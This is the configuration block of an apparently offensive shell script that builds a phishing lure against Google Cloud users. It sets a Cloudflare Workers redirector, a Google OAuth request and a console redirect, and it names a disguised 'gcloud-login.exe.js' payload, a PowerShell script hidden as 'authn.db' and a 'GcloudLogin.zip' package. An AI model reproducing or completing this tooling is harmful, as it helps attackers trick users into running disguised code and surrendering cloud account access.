REDIRECTOR_LOCATION="https://test.xyz.workers.dev/" # For a new worker, change this prior to running, keeping the first subdomain set to your cloudflare account
OAUTH2_REQUEST_URI="https://accounts.google.com/o/oauth2/auth?..."
REDIRECT_302="https://console.cloud.google.com"
ESCAPED_REQ_URI=$(printf '%s' "$OAUTH2_REQUEST_URI" | sed 's/[&/]/\\&/g')
AUTHPARAM_KEY="console"
AUTHPARAM_VALUE=$(cat /proc/sys/kernel/random/uuid)
FAKE_EXE_NAME="gcloud-login.exe.js" # Must be a .js file for this technique to work
FAKE_PWSH_NAME="authn.db" # Can be named anything
ZIP_NAME="GcloudLogin.zip"
OUTPUT_DIR="output"